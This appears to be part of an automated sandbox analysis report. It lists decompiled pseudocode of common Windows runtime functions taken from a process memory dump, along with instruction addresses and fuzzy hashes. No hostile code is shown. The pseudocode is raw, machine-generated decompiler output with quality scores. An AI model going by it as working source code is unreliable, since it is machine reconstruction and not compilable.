						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E053D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L053E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x05403d4c
0x05403d50
0x05403d55
0x05403d5e
0x0543e79a
0x00000000
0x0543e79a
0x05403d68
0x0543e789
0x05403d9d
0x05403da3
0x05403daf
0x05403db5
0x05403dbc
0x05403dc4
0x05403dc9
0x05403dce
0x0543e7ae
0x0543e7ae
0x05403dde
0x05403de2
0x05403de7
0x05403e0d
0x05403e13
0x05403e16
0x05403e1e
0x05403e25
0x05403e28
0x00000000
0x00000000
0x05403e2a
0x05403e2f
0x05403e37
0x05403e37
0x00000000
0x05403e37
0x05403e31
0x00000000
0x05403e31
0x05403e20
0x05403e20
0x05403e35
0x00000000
0x05403de9
0x05403de9
0x05403de9
0x05403dee
0x05403dfd
0x05403dff
0x05403e02
0x05403e05
0x05403e05
0x00000000
0x05403df0
0x05403de7
0x0543e78f
0x0543e794
0x05403d79
0x05403d84
0x05403d89
0x05403d8e
0x00000000
0x0543e7a4
0x05403d96
0x05403d9a
0x00000000
0x05403d9a
0x00000000
0x0543e794
0x05403d6e
0x05403d73
0x00000000
0x0543e7b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c96b0c9f4f4ba4182c1a805dd5dddb649ae22f335927f45eda155eec2f44c8f
Instruction ID: 1644fc2c0ad3b3695fbf35922b13fc4af018da3b144f02963550b66a091cf7cb
Opcode Fuzzy Hash: 7c96b0c9f4f4ba4182c1a805dd5dddb649ae22f335927f45eda155eec2f44c8f
Instruction Fuzzy Hash: 5E3170326056159BC724CF29D446ABBBFA6FF45710B1598BBE44ACB3A0E730D842D790

Uniqueness

Uniqueness Score: -1.00%

Function 053FA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x54a0220);
				E0541D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x54b7b9c; // 0x0
				_t55 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0541D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x54b7b10 =  *0x54b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x54b536c; // 0x77f05368
					if( *_t51 != 0x54b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x54b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x54b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E053FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x053fa61c
0x053fa61e
0x053fa623
0x053fa628
0x053fa62b
0x053fa62d
0x053fa648
0x053fa64a
0x053fa64f
0x05439b44
0x053fa6ec
0x053fa6f1
0x053fa6f1
0x053fa655
0x053fa657
0x053fa65a
0x053fa65d
0x053fa662
0x053fa663
0x053fa667
0x053fa668
0x053fa66d
0x053fa706
0x053fa706
0x05439bda
0x05439be6
0x05439beb
0x00000000
0x05439beb
0x053fa679
0x05439b7a
0x00000000
0x05439b7a
0x053fa683
0x053fa6f4
0x053fa6f7
0x053fa6f9
0x053fa6fd
0x053fa6a0
0x053fa6a0
0x053fa6ad
0x053fa6af
0x053fa6b4
0x05439ba7
0x05439bac
0x00000000
0x00000000
0x05439bc6
0x05439bce
0x05439bd1
0x05439bd3
0x05439bd3
0x00000000
0x05439bd1
0x053fa6bd
0x053fa6c3
0x053fa6c6
0x053fa6d2
0x053fa701
0x053fa704
0x00000000
0x053fa704
0x053fa6d4
0x053fa6d6
0x053fa6d9
0x053fa6db
0x053fa6e1
0x053fa6e6
0x053fa6e8
0x053fa6e8
0x053fa6ea
0x00000000
0x053fa6ea
0x053fa688
0x053fa692
0x053fa694
0x053fa699
0x00000000
0x00000000
0x053fa69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7397d194a9649b0085573fe45a8494728e517d7c3e120f6437818c106d6a427f
Instruction ID: 1a0fe5e75e29c8ec00baf8b1337d042e61a9be134931adfa82206ed368fb58d3
Opcode Fuzzy Hash: 7397d194a9649b0085573fe45a8494728e517d7c3e120f6437818c106d6a427f
Instruction Fuzzy Hash: 6F417BB5A14205DFDB09CF58C484B99BBF2FF49304F1881AAE909AB395D7B4A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 053EC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E053EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E053E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05498D34(_v8, _t80);
					}
					E053E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E053DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05498833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E053DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0540B180();
						if(_a4 != 0) {
							E053E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E053EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E053EBB2D(_t16, _t15);
						E053EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E053DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E053DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E053DFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x053ec18d
0x053ec18f
0x053ec191
0x053ec19b
0x053ec1a0
0x053ec1d4
0x053ec1de
0x05432d6e
0x053ec1e4
0x053ec1e4
0x053ec1e4
0x053ec1ec
0x05432d7d
0x05432d7d
0x053ec1f3
0x053ec1ff
0x05432d88
0x05432d8d
0x05432d94
0x05432d94
0x05432d9f
0x05432da4
0x05432dab
0x05432db0
0x05432db2
0x05432db3
0x05432db4
0x05432dbc
0x05432dc3
0x05432dc3
0x053ec205
0x053ec205
0x053ec208
0x053ec20e
0x053ec211
0x053ec216
0x053ec219
0x053ec21f
0x053ec222
0x053ec22c
0x053ec234
0x053ec23a
0x053ec23f
0x053ec245
0x053ec24b
0x053ec251
0x053ec25a
0x053ec276
0x053ec27d
0x053ec27d
0x053ec25c
0x053ec25c
0x00000000
0x053ec25e
0x053ec1a4
0x053ec1aa
0x053ec1b3
0x053ec265
0x053ec26c
0x053ec26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 028e7862b7f1ef14c3c7fc209c1ec1169d14cab24f5b8b03c6848122cba5c3c8
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: DC31467270559AAEDB05EBB4C884BEEF7A9BF46200F08415AD41857281CB746E09C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05447016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05447016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x54bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05446B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05446B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E053E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05409AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0540B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L053E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05447016
0x0544701e
0x0544702b
0x05447033
0x05447037
0x0544703c
0x0544703e
0x05447041
0x05447045
0x0544704a
0x05447050
0x05447055
0x0544705a
0x05447062
0x05447062
0x0544705a
0x05447064
0x05447064
0x05447067
0x05447071
0x05447096
0x0544709b
0x054470a2
0x054470a6
0x054470a7
0x054470ad
0x054470b3
0x054470b6
0x054470bb
0x054470c3
0x054470c3
0x054470c6
0x054470cd
0x054470dd
0x054470e0
0x054470e2
0x054470e2
0x054470ee
0x05447101
0x054470f0
0x054470f9
0x054470f9
0x0544710a
0x0544710e
0x05447112
0x05447117
0x05447118
0x05447118
0x054470bb
0x0544711d
0x05447123
0x05447131
0x05447131
0x05447136
0x0544713d
0x0544713e
0x0544713f
0x0544714a
0x0544714a
0x05447084
0x05447088
0x00000000
0x0544708e
0x0544708e
0x05447092
0x00000000
0x05447092

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d4e3655fddb1696dd44e87069590289643c3c60feb57b4b65b7ffc05083d4a
Instruction ID: b2e12101034979d609cfc09dc369e7e022f599c6252cd0acd489f50ca0acaed1
Opcode Fuzzy Hash: 23d4e3655fddb1696dd44e87069590289643c3c60feb57b4b65b7ffc05083d4a
Instruction Fuzzy Hash: 5331EA726087919BD310DF28C844AABB3E5FF88700F044A6EF89597790E730D906CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05473D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E05473D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x54bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E053E2280(_t34, 0x54b8a6c);
				_t64 =  *0x54b5768; // 0x77f05768
				if(_t64 != 0x54b5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E053DFFB0(_t53, _t64, 0x54b8a6c);
						 *0x54bb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E053E2280(_t45, 0x54b8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x54b5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E053DFFB0(_t51, _t64, 0x54b8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0540B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x05473d40
0x05473d48
0x05473d52
0x05473d59
0x05473d5d
0x05473d61
0x05473d63
0x05473d67
0x05473d69
0x05473d72
0x05473d76
0x05473d7a
0x05473d7f
0x05473d8b
0x05473d91
0x05473d91
0x05473d91
0x05473d94
0x05473d96
0x05473d9d
0x05473da1
0x05473db0
0x05473dba
0x05473dbc
0x05473dbc
0x05473dc6
0x05473dcb
0x05473dcf
0x05473dd1
0x05473dd4
0x00000000
0x00000000
0x05473dd9
0x05473e0c
0x05473e0c
0x05473e0f
0x05473ddb
0x05473ddb
0x05473de0
0x00000000
0x05473de2
0x05473de2
0x05473de4
0x05473de8
0x05473deb
0x05473df1
0x00000000
0x05473df3
0x05473df3
0x05473df5
0x05473df8
0x05473dfa
0x00000000
0x05473dfa
0x05473df1
0x05473de0
0x05473e11
0x05473e11
0x00000000
0x05473dfe
0x05473e04
0x05473e06
0x00000000
0x05473e06
0x00000000
0x05473e04
0x05473d91
0x05473e15
0x05473e1a
0x05473e1f
0x05473e1f
0x05473e23
0x05473e29
0x00000000
0x00000000
0x05473e2e
0x00000000
0x05473e30
0x05473e30
0x05473e35
0x00000000
0x05473e37
0x05473e3e
0x05473e42
0x05473e48
0x05473e4e
0x00000000
0x05473e4e
0x05473e35
0x00000000
0x05473e2e
0x05473e5b
0x05473e5c
0x05473e5d
0x05473e68
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ec8f9f37c6f1779480d24b5844f4f0cbe4ea8159a52c45d9e5db542f4d6088
Instruction ID: 2422eae7ce0c5dde92e768ce4e0f3ae94b1ab00ebc43d7a87772e83365030665
Opcode Fuzzy Hash: 28ec8f9f37c6f1779480d24b5844f4f0cbe4ea8159a52c45d9e5db542f4d6088
Instruction Fuzzy Hash: 703157B2609306CFC714DF14D5849EABBE6FB85604F1449AEF4999B340D730EA05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 053FA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E053FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x54b7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x54b7b10 = 8;
					 *0x54b7b14 = 0x54b7b0c;
					 *0x54b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E053FA990(0x54b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L053FA840(__edx, __ecx, __ecx, _t52, 0x54b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x54b7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x54b7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x54b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L053E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x54b7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0540F3E0(_t50,  *0x54b7b14, _t8 >> 3);
						_t28 =  *0x54b7b14; // 0x0
						__eflags = _t28 - 0x54b7b0c;
						if(_t28 != 0x54b7b0c) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x54b7b14 = _t50;
						_t48 = _v12;
						 *0x54b7b10 = _t9;
						goto L6;
					}
					 *0x54b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x053fa713
0x053fa714
0x053fa717
0x053fa71d
0x053fa720
0x053fa722
0x053fa727
0x053fa74a
0x053fa754
0x053fa75e
0x053fa768
0x053fa76a
0x053fa773
0x053fa78b
0x053fa790
0x053fa792
0x053fa741
0x053fa741
0x053fa743
0x053fa749
0x053fa749
0x053fa732
0x053fa73a
0x053fa797
0x053fa79d
0x053fa7a3
0x053fa7a9
0x053fa7b6
0x053fa7bc
0x053fa7ca
0x053fa7e0
0x053fa7e2
0x053fa7e4
0x05439bf2
0x00000000
0x05439bf2
0x053fa7ed
0x053fa7f2
0x053fa800
0x053fa805
0x053fa80d
0x053fa812
0x05439c08
0x05439c08
0x053fa818
0x053fa81b
0x053fa821
0x053fa824
0x00000000
0x053fa824
0x053fa7ae
0x00000000
0x053fa7ae
0x053fa73c
0x053fa73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e4364a67c88b55597c1b84c59c41171dc8656d9afd61f3290aa19bcef7c1ee
Instruction ID: 3a4ec1bac0b731c36a36376204d45987577f1fc3daf4ea42f3c5b04637ded3a6
Opcode Fuzzy Hash: 17e4364a67c88b55597c1b84c59c41171dc8656d9afd61f3290aa19bcef7c1ee
Instruction Fuzzy Hash: 7731E3B12282009BE719CF58D88AFA57BFAFBC4794F10095AF109D7B45DBB0A911CF91

Uniqueness

Uniqueness Score: -1.00%

Function 053F61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E053F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E053F5E50(0x53a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05499D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E053CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x053f61b3
0x053f61b5
0x053f61bd
0x053f61c3
0x053f61c7
0x053f61d2
0x053f61ff
0x053f61ff
0x053f6201
0x053f6207
0x053f6207
0x053f61d4
0x053f61d9
0x00000000
0x00000000
0x053f61df
0x053f61e2
0x00000000
0x00000000
0x053f61e6
0x053f61e8
0x053f61ee
0x053f61ee
0x053f61f9
0x0543762f
0x05437632
0x05437635
0x05437639
0x05437640
0x0543766e
0x05437675
0x00000000
0x00000000
0x05437681
0x05437689
0x0543768d
0x05437691
0x05437695
0x05437699
0x054376af
0x054376b5
0x054376b7
0x054376b7
0x054376d7
0x054376dc
0x00000000
0x054376dc
0x054376a2
0x054376a9
0x05437651
0x05437653
0x05437653
0x05437656
0x05437656
0x00000000
0x05437656
0x05437644
0x05437646
0x05437648
0x05437648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ec9a489fa3db24d96cd454fea12d1ecc9bf090c0394565926993b2e07049ef
Instruction ID: 9d425ac43b9ab00a58efbccc4c002f27783f9e7c724074c90096e3e8c10ad1e9
Opcode Fuzzy Hash: f8ec9a489fa3db24d96cd454fea12d1ecc9bf090c0394565926993b2e07049ef
Instruction Fuzzy Hash: 3331AEB16097019FD720CF09C851B6AB7E9FB88B10F05497EE995D7361D7B0D904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 053CAA16, Relevance: .1, Instructions: 93
